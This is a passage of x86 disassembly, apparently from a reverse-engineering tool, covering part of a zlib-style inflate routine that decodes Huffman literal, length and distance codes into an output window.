mov ecx, [ebp+var_10]
xor edx, edx
mov dl, [ecx+11h]
push edx
mov eax, [ebp+var_10]
xor ecx, ecx
mov cl, [eax+10h]
push ecx
call sub_42CF86
add esp, 18h
mov [ebp+arg_8], eax
mov edx, [ebp+arg_4]
mov eax, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
mov [ebp+var_2C], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [ebp+var_24], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+34h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_42A2D7
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_38], eax
jmp short loc_42A2E3
; ---------------------------------------------------------------------------
loc_42A2D7: ; CODE XREF: sub_42A17E+146�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_38], edx
loc_42A2E3: ; CODE XREF: sub_42A17E+157�j
mov eax, [ebp+var_38]
mov [ebp+var_28], eax
cmp [ebp+arg_8], 0
jz short loc_42A309
mov ecx, [ebp+arg_8]
sub ecx, 1
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 7
mov edx, [ebp+var_10]
mov [edx], ecx
jmp loc_42AEA4
; ---------------------------------------------------------------------------
loc_42A309: ; CODE XREF: sub_42A17E+8C�j
; sub_42A17E+96�j ...
mov eax, [ebp+var_10]
xor ecx, ecx
mov cl, [eax+10h]
mov edx, [ebp+var_10]
mov [edx+0Ch], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_10]
mov edx, [ecx+14h]
mov [eax+8], edx
mov eax, [ebp+var_10]
mov dword ptr [eax], 1
loc_42A32C: ; CODE XREF: sub_42A17E+7E�j
; DATA XREF: HLXc:0042AEB1�o
mov ecx, [ebp+var_10]
mov edx, [ecx+0Ch]
mov [ebp+var_20], edx
loc_42A335: ; CODE XREF: sub_42A17E+25C�j
mov eax, [ebp+var_24]
cmp eax, [ebp+var_20]
jnb loc_42A3DF
cmp [ebp+var_2C], 0
jz short loc_42A350
mov [ebp+arg_8], 0
jmp short loc_42A3AB
; ---------------------------------------------------------------------------
loc_42A350: ; CODE XREF: sub_42A17E+1C7�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42A3AB: ; CODE XREF: sub_42A17E+1D0�j
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_24]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_24]
add eax, 8
mov [ebp+var_24], eax
jmp loc_42A335
; ---------------------------------------------------------------------------
loc_42A3DF: ; CODE XREF: sub_42A17E+1BD�j
mov ecx, [ebp+var_20]
mov edx, [ebp+var_C]
and edx, dword_433308[ecx*4]
mov eax, [ebp+var_10]
mov ecx, [eax+8]
lea edx, [ecx+edx*8]
mov [ebp+var_14], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_C]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_24]
sub edx, ecx
mov [ebp+var_24], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_18], ecx
cmp [ebp+var_18], 0
jnz short loc_42A442
mov edx, [ebp+var_10]
mov eax, [ebp+var_14]
mov ecx, [eax+4]
mov [edx+8], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 6
jmp loc_42AEA4
; ---------------------------------------------------------------------------
loc_42A442: ; CODE XREF: sub_42A17E+2A8�j
mov eax, [ebp+var_18]
and eax, 10h
test eax, eax
jz short loc_42A472
mov ecx, [ebp+var_18]
and ecx, 0Fh
mov edx, [ebp+var_10]
mov [edx+8], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_14]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_10]
mov dword ptr [eax], 2
jmp loc_42AEA4
; ---------------------------------------------------------------------------
loc_42A472: ; CODE XREF: sub_42A17E+2CC�j
mov ecx, [ebp+var_18]
and ecx, 40h
test ecx, ecx
jnz short loc_42A49C
mov edx, [ebp+var_10]
mov eax, [ebp+var_18]
mov [edx+0Ch], eax
mov ecx, [ebp+var_14]
mov edx, [ecx+4]
mov eax, [ebp+var_14]
lea ecx, [eax+edx*8]
mov edx, [ebp+var_10]
mov [edx+8], ecx
jmp loc_42AEA4
; ---------------------------------------------------------------------------
loc_42A49C: ; CODE XREF: sub_42A17E+2FC�j
mov eax, [ebp+var_18]
and eax, 20h
test eax, eax
jz short loc_42A4B4
mov ecx, [ebp+var_10]
mov dword ptr [ecx], 7
jmp loc_42AEA4
; ---------------------------------------------------------------------------
loc_42A4B4: ; CODE XREF: sub_42A17E+326�j
mov edx, [ebp+var_10]
mov dword ptr [edx], 9
mov eax, [ebp+arg_4]
mov dword ptr [eax+18h], offset aInvalidLiteral ; "invalid literal/length code"
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42A529: ; CODE XREF: sub_42A17E+7E�j
; DATA XREF: HLXc:0042AEB5�o
mov ecx, [ebp+var_10]
mov edx, [ecx+8]
mov [ebp+var_20], edx
loc_42A532: ; CODE XREF: sub_42A17E+459�j
mov eax, [ebp+var_24]
cmp eax, [ebp+var_20]
jnb loc_42A5DC
cmp [ebp+var_2C], 0
jz short loc_42A54D
mov [ebp+arg_8], 0
jmp short loc_42A5A8
; ---------------------------------------------------------------------------
loc_42A54D: ; CODE XREF: sub_42A17E+3C4�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42A5A8: ; CODE XREF: sub_42A17E+3CD�j
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_24]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_24]
add eax, 8
mov [ebp+var_24], eax
jmp loc_42A532
; ---------------------------------------------------------------------------
loc_42A5DC: ; CODE XREF: sub_42A17E+3BA�j
mov ecx, [ebp+var_20]
mov edx, [ebp+var_C]
and edx, dword_433308[ecx*4]
mov eax, [ebp+var_10]
mov ecx, [eax+4]
add ecx, edx
mov edx, [ebp+var_10]
mov [edx+4], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_20]
shr eax, cl
mov [ebp+var_C], eax
mov ecx, [ebp+var_24]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
mov edx, [ebp+var_10]
xor eax, eax
mov al, [edx+11h]
mov ecx, [ebp+var_10]
mov [ecx+0Ch], eax
mov edx, [ebp+var_10]
mov eax, [ebp+var_10]
mov ecx, [eax+18h]
mov [edx+8], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 3
loc_42A62E: ; CODE XREF: sub_42A17E+7E�j
; DATA XREF: HLXc:0042AEB9�o
mov eax, [ebp+var_10]
mov ecx, [eax+0Ch]
mov [ebp+var_20], ecx
loc_42A637: ; CODE XREF: sub_42A17E+55E�j
mov edx, [ebp+var_24]
cmp edx, [ebp+var_20]
jnb loc_42A6E1
cmp [ebp+var_2C], 0
jz short loc_42A652
mov [ebp+arg_8], 0
jmp short loc_42A6AD
; ---------------------------------------------------------------------------
loc_42A652: ; CODE XREF: sub_42A17E+4C9�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42A6AD: ; CODE XREF: sub_42A17E+4D2�j
mov eax, [ebp+var_2C]
sub eax, 1
mov [ebp+var_2C], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, [ebp+var_24]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_24]
add edx, 8
mov [ebp+var_24], edx
jmp loc_42A637
; ---------------------------------------------------------------------------
loc_42A6E1: ; CODE XREF: sub_42A17E+4BF�j
mov eax, [ebp+var_20]
mov ecx, [ebp+var_C]
and ecx, dword_433308[eax*4]
mov edx, [ebp+var_10]
mov eax, [edx+8]
lea ecx, [eax+ecx*8]
mov [ebp+var_14], ecx
mov edx, [ebp+var_14]
xor eax, eax
mov al, [edx+1]
mov ecx, eax
mov edx, [ebp+var_C]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax+1]
mov edx, [ebp+var_24]
sub edx, ecx
mov [ebp+var_24], edx
mov eax, [ebp+var_14]
xor ecx, ecx
mov cl, [eax]
mov [ebp+var_18], ecx
mov edx, [ebp+var_18]
and edx, 10h
test edx, edx
jz short loc_42A756
mov eax, [ebp+var_18]
and eax, 0Fh
mov ecx, [ebp+var_10]
mov [ecx+8], eax
mov edx, [ebp+var_10]
mov eax, [ebp+var_14]
mov ecx, [eax+4]
mov [edx+0Ch], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 4
jmp loc_42AEA4
; ---------------------------------------------------------------------------
loc_42A756: ; CODE XREF: sub_42A17E+5B0�j
mov eax, [ebp+var_18]
and eax, 40h
test eax, eax
jnz short loc_42A780
mov ecx, [ebp+var_10]
mov edx, [ebp+var_18]
mov [ecx+0Ch], edx
mov eax, [ebp+var_14]
mov ecx, [eax+4]
mov edx, [ebp+var_14]
lea eax, [edx+ecx*8]
mov ecx, [ebp+var_10]
mov [ecx+8], eax
jmp loc_42AEA4
; ---------------------------------------------------------------------------
loc_42A780: ; CODE XREF: sub_42A17E+5E0�j
mov edx, [ebp+var_10]
mov dword ptr [edx], 9
mov eax, [ebp+arg_4]
mov dword ptr [eax+18h], offset aInvalidDistanc ; "invalid distance code"
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42A7F5: ; CODE XREF: sub_42A17E+7E�j
; DATA XREF: HLXc:0042AEBD�o
mov ecx, [ebp+var_10]
mov edx, [ecx+8]
mov [ebp+var_20], edx
loc_42A7FE: ; CODE XREF: sub_42A17E+725�j
mov eax, [ebp+var_24]
cmp eax, [ebp+var_20]
jnb loc_42A8A8
cmp [ebp+var_2C], 0
jz short loc_42A819
mov [ebp+arg_8], 0
jmp short loc_42A874
; ---------------------------------------------------------------------------
loc_42A819: ; CODE XREF: sub_42A17E+690�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42A874: ; CODE XREF: sub_42A17E+699�j
mov ecx, [ebp+var_2C]
sub ecx, 1
mov [ebp+var_2C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_24]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_24]
add eax, 8
mov [ebp+var_24], eax
jmp loc_42A7FE
; ---------------------------------------------------------------------------
loc_42A8A8: ; CODE XREF: sub_42A17E+686�j
mov ecx, [ebp+var_20]
mov edx, [ebp+var_C]
and edx, dword_433308[ecx*4]
mov eax, [ebp+var_10]
mov ecx, [eax+0Ch]
add ecx, edx
mov edx, [ebp+var_10]
mov [edx+0Ch], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_20]
shr eax, cl
mov [ebp+var_C], eax
mov ecx, [ebp+var_24]
sub ecx, [ebp+var_20]
mov [ebp+var_24], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 5
loc_42A8E0: ; CODE XREF: sub_42A17E+7E�j
; DATA XREF: HLXc:0042AEC1�o
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
sub ecx, [eax+28h]
mov edx, [ebp+var_10]
cmp ecx, [edx+0Ch]
jnb short loc_42A90F
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
sub ecx, [eax+28h]
mov edx, [ebp+var_10]
mov eax, [edx+0Ch]
sub eax, ecx
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, eax
mov [ebp+var_3C], edx
jmp short loc_42A91B
; ---------------------------------------------------------------------------
loc_42A90F: ; CODE XREF: sub_42A17E+771�j
mov eax, [ebp+var_10]
mov ecx, [ebp+var_8]
sub ecx, [eax+0Ch]
mov [ebp+var_3C], ecx
loc_42A91B: ; CODE XREF: sub_42A17E+78F�j
mov edx, [ebp+var_3C]
mov [ebp+var_1C], edx
loc_42A921: ; CODE XREF: sub_42A17E+96B�j
mov eax, [ebp+var_10]
cmp dword ptr [eax+4], 0
jz loc_42AAEE
cmp [ebp+var_28], 0
jnz loc_42AA9A
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+2Ch]
jnz short loc_42A988
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_0]
mov edx, [eax+30h]
cmp edx, [ecx+28h]
jz short loc_42A988
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+30h]
jnb short loc_42A976
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
sub edx, [ebp+var_8]
sub edx, 1
mov [ebp+var_40], edx
jmp short loc_42A982
; ---------------------------------------------------------------------------
loc_42A976: ; CODE XREF: sub_42A17E+7E5�j
mov eax, [ebp+arg_0]
mov ecx, [eax+2Ch]
sub ecx, [ebp+var_8]
mov [ebp+var_40], ecx
loc_42A982: ; CODE XREF: sub_42A17E+7F6�j
mov edx, [ebp+var_40]
mov [ebp+var_28], edx
loc_42A988: ; CODE XREF: sub_42A17E+7C3�j
; sub_42A17E+7D1�j
cmp [ebp+var_28], 0
jnz loc_42AA9A
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
mov [ebp+arg_8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_42A9D7
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_44], ecx
jmp short loc_42A9E3
; ---------------------------------------------------------------------------
loc_42A9D7: ; CODE XREF: sub_42A17E+846�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_44], eax
loc_42A9E3: ; CODE XREF: sub_42A17E+857�j
mov ecx, [ebp+var_44]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+2Ch]
jnz short loc_42AA39
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_0]
mov eax, [ecx+30h]
cmp eax, [edx+28h]
jz short loc_42AA39
mov ecx, [ebp+arg_0]
mov edx, [ecx+28h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_42AA27
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_48], eax
jmp short loc_42AA33
; ---------------------------------------------------------------------------
loc_42AA27: ; CODE XREF: sub_42A17E+896�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_48], edx
loc_42AA33: ; CODE XREF: sub_42A17E+8A7�j
mov eax, [ebp+var_48]
mov [ebp+var_28], eax
loc_42AA39: ; CODE XREF: sub_42A17E+874�j
; sub_42A17E+882�j
cmp [ebp+var_28], 0
jnz short loc_42AA9A
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_24]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42AA9A: ; CODE XREF: sub_42A17E+7B4�j
; sub_42A17E+80E�j ...
mov [ebp+arg_8], 0
mov ecx, [ebp+var_8]
mov edx, [ebp+var_1C]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+var_1C]
add edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_28]
sub eax, 1
mov [ebp+var_28], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_1C]
cmp edx, [ecx+2Ch]
jnz short loc_42AADA
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_1C], ecx
loc_42AADA: ; CODE XREF: sub_42A17E+951�j
mov edx, [ebp+var_10]
mov eax, [edx+4]
sub eax, 1
mov ecx, [ebp+var_10]
mov [ecx+4], eax
jmp loc_42A921
; ---------------------------------------------------------------------------
loc_42AAEE: ; CODE XREF: sub_42A17E+7AA�j
mov edx, [ebp+var_10]
mov dword ptr [edx], 0
jmp loc_42AEA4
; ---------------------------------------------------------------------------
loc_42AAFC: ; CODE XREF: sub_42A17E+7E�j
; DATA XREF: HLXc:0042AEC5�o
cmp [ebp+var_28], 0
jnz loc_42AC68
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+2Ch]
jnz short loc_42AB56
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [edx+30h]
cmp ecx, [eax+28h]
jz short loc_42AB56
mov edx, [ebp+arg_0]
mov eax, [edx+28h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_42AB44
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_4C], ecx
jmp short loc_42AB50
; ---------------------------------------------------------------------------
loc_42AB44: ; CODE XREF: sub_42A17E+9B3�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_4C], eax
loc_42AB50: ; CODE XREF: sub_42A17E+9C4�j
mov ecx, [ebp+var_4C]
mov [ebp+var_28], ecx
loc_42AB56: ; CODE XREF: sub_42A17E+991�j
; sub_42A17E+99F�j
cmp [ebp+var_28], 0
jnz loc_42AC68
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
mov [ebp+arg_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+34h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_42ABA5
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_50], eax
jmp short loc_42ABB1
; ---------------------------------------------------------------------------
loc_42ABA5: ; CODE XREF: sub_42A17E+A14�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_50], edx
loc_42ABB1: ; CODE XREF: sub_42A17E+A25�j
mov eax, [ebp+var_50]
mov [ebp+var_28], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+2Ch]
jnz short loc_42AC07
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_0]
mov edx, [eax+30h]
cmp edx, [ecx+28h]
jz short loc_42AC07
mov eax, [ebp+arg_0]
mov ecx, [eax+28h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+30h]
jnb short loc_42ABF5
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
sub edx, [ebp+var_8]
sub edx, 1
mov [ebp+var_54], edx
jmp short loc_42AC01
; ---------------------------------------------------------------------------
loc_42ABF5: ; CODE XREF: sub_42A17E+A64�j
mov eax, [ebp+arg_0]
mov ecx, [eax+2Ch]
sub ecx, [ebp+var_8]
mov [ebp+var_54], ecx
loc_42AC01: ; CODE XREF: sub_42A17E+A75�j
mov edx, [ebp+var_54]
mov [ebp+var_28], edx
loc_42AC07: ; CODE XREF: sub_42A17E+A42�j
; sub_42A17E+A50�j
cmp [ebp+var_28], 0
jnz short loc_42AC68
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_24]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
jmp loc_42AEA9
; ---------------------------------------------------------------------------
loc_42AC68: ; CODE XREF: sub_42A17E+982�j
; sub_42A17E+9DC�j ...
mov [ebp+arg_8], 0
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
mov dl, [ecx+8]
mov [eax], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_28]
sub ecx, 1
mov [ebp+var_28], ecx
mov edx, [ebp+var_10]
mov dword ptr [edx], 0
jmp loc_42AEA4
; ---------------------------------------------------------------------------
loc_42AC9A: ; CODE XREF: sub_42A17E+7E�j
; DATA XREF: HLXc:0042AEC9�o
cmp [ebp+var_24], 7
jbe short loc_42ACBB
mov eax, [ebp+var_24]
sub eax, 8
mov [ebp+var_24], eax
mov ecx, [ebp+var_2C]
add ecx, 1
mov [ebp+var_2C], ecx
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_42ACBB: ; CODE XREF: sub_42A17E+B20�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
mov [ebp+arg_8], eax
mov edx, [ebp+arg_0]
mov eax, [edx+34h]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
cmp edx, [ecx+30h]
jnb short loc_42AD00
mov eax, [ebp+arg_0]
mov ecx, [eax+30h]
sub ecx, [ebp+var_8]
sub ecx, 1
mov [ebp+var_58], ecx
jmp short loc_42AD0C
; ---------------------------------------------------------------------------
loc_42AD00: ; CODE XREF: sub_42A17E+B6F�j
mov edx, [ebp+arg_0]
mov eax, [edx+2Ch]
sub eax, [ebp+var_8]
mov [ebp+var_58], eax
loc_42AD0C: ; CODE XREF: sub_42A17E+B80�j
mov ecx, [ebp+var_58]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_0]
mov ecx, [edx+30h]
cmp ecx, [eax+34h]
jz short loc_42AD7B
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_24]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_2C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
